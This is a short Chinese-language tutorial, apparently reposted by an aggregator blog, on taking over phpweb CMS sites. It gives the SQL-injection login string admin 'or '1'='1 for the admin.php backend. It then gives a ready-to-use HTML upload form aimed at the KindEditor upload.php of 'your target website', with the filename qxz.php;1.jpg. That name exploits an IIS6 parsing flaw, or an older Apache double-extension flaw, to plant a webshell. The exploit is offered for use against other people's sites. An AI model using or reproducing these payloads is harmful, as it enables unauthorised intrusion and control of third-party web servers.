首先登錄后臺(tái)admin.php(默認(rèn)后臺(tái)admin.php)

有的phpweb網(wǎng)站存在萬(wàn)能密碼登錄

帳號(hào)密碼都輸入：admin 'or '1'='1直接登錄

登錄后臺(tái)管理系統(tǒng)后，然后把下面的文件保存為xxx.html，修改action，把www.xxx.com?改成你的目標(biāo)網(wǎng)站地址。?

<form name="uploadForm" method="post" enctype="multipart/form-data"action="http://www.xxx.com/kedit/upload_cgi/upload.php"> <input type="text" name="fileName" value="qxz.php;1.jpg" /> <input type="hidden" name="attachPath" value="news/pics/" /> <input type="file" name="fileData" size="14" /></td> <input type="submit" name="button" value="確定" /> </form> 然后選擇你的馬兒再上傳

上傳后如果為iis6，就點(diǎn)擊查看源碼就可以找到馬兒的路徑了。

PS：qxz.php;1.jpg這樣的文件是允許上傳的，只要服務(wù)器是IIS6就拿到webshell，低版本的apache可以試著重命名為qxz.php.jpg

總結(jié)

以上是生活随笔為你收集整理的phpweb后台拿shell方法的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。